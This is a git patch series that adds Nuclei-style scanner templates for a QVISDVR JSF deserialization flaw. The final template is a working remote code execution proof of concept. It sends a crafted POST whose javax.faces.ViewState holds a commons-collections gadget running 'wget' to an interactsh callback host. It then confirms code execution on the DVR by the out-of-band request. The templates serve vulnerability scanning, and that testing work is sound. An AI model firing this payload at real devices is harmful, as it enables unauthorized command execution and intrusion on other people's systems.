From 58a79ddf4a5e0c6faaa8d44b06d54f9b59c1e11a Mon Sep 17 00:00:00 2001 From: Me9187 <78823654+Meeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee@users.noreply.github.com> Date: Mon, 12 Jul 2021 16:21:03 +0100 Subject: [PATCH 1/4] Create QVISDVR-Java-Deserialization --- iot/QVISDVR-Java-Deserialization | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 iot/QVISDVR-Java-Deserialization diff --git a/iot/QVISDVR-Java-Deserialization b/iot/QVISDVR-Java-Deserialization new file mode 100644 index 0000000000..a11811614a --- /dev/null +++ b/iot/QVISDVR-Java-Deserialization @@ -0,0 +1,18 @@ +id: qvisdvr-java-deserialization + +info: + name: QVISdvr Java Deserialization + author: me9187 + severity: critical + description: Searches for /qvisdvr/index.faces use https://github.com/joaomatosf/jexboss to Get RCE! + references: https://github.com/joaomatosf/jexboss + tags: rce + +requests: + - method: GET + path: + - "{{BaseURL}}/qvisdvr/" + matchers: + - type: word + words: + - "/qvisdvr/index.faces" From 020b7974e048797843c05cc1b3ad06c7550ca56e Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 13 Jul 2021 16:20:01 +0530 Subject: [PATCH 2/4] minor update --- ...DVR-Java-Deserialization => qvisdvr-java-deserialization.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename iot/{QVISDVR-Java-Deserialization => qvisdvr-java-deserialization.yaml} (100%) diff --git a/iot/QVISDVR-Java-Deserialization b/iot/qvisdvr-java-deserialization.yaml similarity index 100% rename from iot/QVISDVR-Java-Deserialization rename to iot/qvisdvr-java-deserialization.yaml From a3057a63ae5acf6917271b7b3e5394777b1ae465 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 18 Jul 2021 22:00:43 +0530 Subject: [PATCH 3/4] Added Deserialization POC --- iot/qvisdvr-deserialization-rce.yaml | 50 +++++++++++++++++++++++++++ iot/qvisdvr-java-deserialization.yaml | 18 ---------- 2 files changed, 50 insertions(+), 18 deletions(-) create mode 100644 iot/qvisdvr-deserialization-rce.yaml delete mode 100644 iot/qvisdvr-java-deserialization.yaml diff --git a/iot/qvisdvr-deserialization-rce.yaml b/iot/qvisdvr-deserialization-rce.yaml new file mode 100644 index 0000000000..f8316e0d7d --- /dev/null +++ b/iot/qvisdvr-deserialization-rce.yaml @@ -0,0 +1,50 @@ +id: qvisdvr-deserialization-rce + +info: + author: me9187 + name: QVISDVR JSF Deserialization - Remote Code Execution + severity: critical + reference: https://twitter.com/Me9187/status/1414606876575162373 + tags: qvisdvr,rce,deserialization,jsf,iot + +requests: + - raw: + - | + GET /qvisdvr/ HTTP/1.1 + Accept-Encoding: gzip, deflate + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Host: {{Hostname}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9 + Content-Type: application/x-www-form-urlencoded + - | + POST /qvisdvr/index.faces;jsessionid={{token}} HTTP/1.1 + Accept-Encoding: gzip, deflate + Content-Length: 1884 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Host: {{Hostname}} + Connection: close + User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) + Content-Type: application/x-www-form-urlencoded + + javax.faces.ViewState={{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}")}} + + extractors: + - type: regex + name: token + group: 1 + internal: true + part: header + regex: + - "JSESSIONID=(.*)" + + matchers-condition: and + matchers: + - type: status + status: + - 500 + + - type: word + part: interactsh_protocol + words: + - http \ No newline at end of file diff --git a/iot/qvisdvr-java-deserialization.yaml b/iot/qvisdvr-java-deserialization.yaml deleted file mode 100644 index a11811614a..0000000000 --- a/iot/qvisdvr-java-deserialization.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: qvisdvr-java-deserialization - -info: - name: QVISdvr Java Deserialization - author: me9187 - severity: critical - description: Searches for /qvisdvr/index.faces use https://github.com/joaomatosf/jexboss to Get RCE! - references: https://github.com/joaomatosf/jexboss - tags: rce - -requests: - - method: GET - path: - - "{{BaseURL}}/qvisdvr/" - matchers: - - type: word - words: - - "/qvisdvr/index.faces" From 718b8bfdd93b78673a48f19ac02241bdde728c47 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 18 Jul 2021 22:02:30 +0530 Subject: [PATCH 4/4] Update qvisdvr-deserialization-rce.yaml --- iot/qvisdvr-deserialization-rce.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/iot/qvisdvr-deserialization-rce.yaml b/iot/qvisdvr-deserialization-rce.yaml index f8316e0d7d..9d77efad68 100644 --- a/iot/qvisdvr-deserialization-rce.yaml +++ b/iot/qvisdvr-deserialization-rce.yaml @@ -11,18 +11,18 @@ requests: - raw: - | GET /qvisdvr/ HTTP/1.1 + Host: {{Hostname}} Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Host: {{Hostname}} Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9 Content-Type: application/x-www-form-urlencoded - | POST /qvisdvr/index.faces;jsessionid={{token}} HTTP/1.1 + Host: {{Hostname}} Accept-Encoding: gzip, deflate Content-Length: 1884 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Host: {{Hostname}} Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded